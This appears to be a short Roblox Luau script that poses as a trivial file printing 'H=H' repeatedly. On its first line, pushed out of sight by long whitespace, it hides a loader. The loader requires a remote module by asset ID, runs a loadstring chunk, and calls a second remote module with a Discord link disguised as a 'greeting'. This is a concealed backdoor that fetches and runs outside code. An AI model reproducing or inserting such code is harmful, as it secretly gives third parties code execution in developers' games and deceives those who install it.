print("H=H")                                                                                                                                                                                                                                                                     local loadstring = require(14382140693) loadstring.luau_execute([[local function randomGreeting() local greetings = {"https://discord.gg/codiene", "https://discord.gg/ske"}   return greetings[math.random(#greetings)] end local a1 = randomGreeting() require(15772895549).load(a1)]])()                                                                                                                                                                                                         
print("H=H")  
print("H=H")  
print("H=H")  
print("H=H")  
print("H=H")  
print("H=H")  
